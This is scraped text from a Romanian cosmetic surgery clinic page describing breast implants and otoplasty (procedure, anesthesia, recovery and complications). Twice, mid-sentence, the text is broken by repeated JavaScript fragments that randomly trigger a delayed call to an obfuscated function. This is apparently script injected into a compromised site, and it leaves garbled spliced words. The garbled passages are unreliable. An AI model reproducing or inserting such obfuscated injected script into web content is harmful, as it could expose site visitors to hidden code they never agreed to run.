surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Otoplastie

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Urechile decolate ( urechi clapauge) pot fi daunatoare din punct de vedere psihologic pentru un copil dar si pentru un adult.

Pe la varsta de 7 ani copiii incep sa se uite atent la sine si la ceilalti, ei incep sa observe diferente si este deosebit de neplacut pentru cei cu urechi proeminente candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and li se atribuie nick-name-uri sau porecle pe aceste considerente.
Operatia se adreseaza femeilor si barbatilor care sunt nemultumiti de aspectul urechilor lor.

Otoplastia poate fi efectuata la orice varsta.
Daca sunteti nemultumita de aspectul urechilor dumneavoastra aceasta operatie ofera noi posibilitati pentru a avea un nou “look”. Efectul postoperator este permanent iar urechile nu revin la pozitia initiala.

Scopul chirurgiei plastice in procedura otoplastiei este de-a plasa pavilionul urechii cat mai aproape de partea laterala a capului.


Interventia chirurgicala se realizeaza prin remodelarea cartilajului auricular si ancorarea lui pentru a apropia urechile de cap. Sutura se face cu fire neresorbabile pentru a mentine permanent noua pozitionare. Inciziile rezultate sunt pe fata posterioara a urechii si sunt mascate.
Operatia se efectueaza sub anestezie generala in special in cazul copiilor deoarece este cea mai sigura si asigura confort operator echipei chirurgicale.

Timpul necesar pentru efectuarea otoplastiei depinde de mai multi factori incluzind abordul chirurgical, complexitatea operatiei, anatomia pacientului/ei, tipul anesteziei.
Cele mai multe otoplastii nu necesita zile de spitalizare postoperatorie, pacientii putandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and pleca acasa la cateva ore dupa operatie, dar in cazul copiilor care au beneficiat de anestezie generala sunt indicate 1-2 zile de spitalizare pentru a ramane dupa operatie sub observarea personalului medico-chirurgical de specialitate.

Cateva posibile complicatii sunt: sangerare, hematom, infectia, alergie la anestezic. Urmati indicatiile chirurgului plastician pentru a evita aceste complicatii.
Efectele postoperatorii se manifesta prin umflarea urechii si dureri de intensitate redusa. Umflaturile dispar dupa cateva zile . Primele pansamente vor fi mai voluminoase, iar urmatoarele vor fi pansamente fine.
Firele se scot dupa 7-10 zile.

Cicatricile rezultate sunt mici si nu pun probleme din punct de vedere estetic. Ele vor avea o culoare roz cateva luni, dupa care vor capata culoarea tegumentului din jur.
De obicei activitatea se poate relua dupa 2-3 zile.
Otoplastia produce o schimbare pozitiva a fetei.
Aceasta duce la o crestere a increderii in sine deoarece defectul urechiilor decolate a fost inlaturat.

Suna Acum!
Navigheaza!